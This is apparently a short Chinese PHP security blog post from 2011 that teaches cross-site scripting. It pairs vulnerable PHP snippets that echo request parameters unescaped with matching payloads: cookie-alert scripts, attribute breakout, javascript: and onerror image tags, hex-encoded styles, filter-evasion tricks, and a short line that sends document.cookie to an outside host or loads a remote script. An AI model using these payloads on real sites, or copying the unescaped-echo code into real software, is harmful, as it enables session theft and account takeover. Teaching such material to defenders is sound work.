PHP安全新闻早8点_1112
// 2011-11-12 星期六
// 程序员的思维:
// index.php ---代码片段
<?php
$Micropoor = $_GET['Micropoor'];
print $Micropoor;
?>
//我们的思维:
index.php?Micropoor=<script>alert(document.cookie)</script>
############################################################
// 程序员的思维:
// index.php ---代码片段
<html>
<body>
//...略
<input name="Micropoor" value="<?php echo $_GET['Micropoor']; ?>" >
//...略
</body>
</html>
//我们的思维:
[url]http://127.0.0.1:81/index.php?Micropoor=[/url]"><script>alert(document.cookie);</script>
###############################################################
// 程序员的思维:
程序员过滤了<script></script>标签,那么在页面上就不会执行这段js代码
//我们的思维:
<img src='http://hi.baidu.com/micropoor/Micropoor.jpg'>img的src标签是指向一个web服务器的图片URL
但是也可以替换为:<img src='javascript:alert("Micropoor")'>
其他:进制转换,加入混淆字符,加密等。
#############################################################
//突破长短:
下面的 28 字节命令将把用户的cookie传送至主机名为micropoor:的服务器。
open("//micropoor/"+document.cookie)
如果直接注入 HTML
么下面这个30字节的标签将从主机名为micropoor:的服务器加载并执行一段脚本。
<script src=http://micropoor></script>
知识拓展:
1,直接使用JS脚本。
<img src="javascript:alert('Micropoor')" />
2,对JS脚本进行转码。
<img src="javascript:alert('Micropoor')" />
3,利用标签的触发条件插入代码并进行转码。
<img onerror="alert('Micropoor')" />
4,使用16进制来写
<img STYLE="background-image: \75\72\6c\28\6a\61\76\61\73\63\72\69\70\74\3a\61\6c\65\72\74\28\27\58\53\53\27\29\29">
两种类型
存储型XSS
反射型XSS
新闻就是新闻,不做深究。功底也无法深究。
结论:一切的输入都是有害的。


浙公网安备 33010602011771号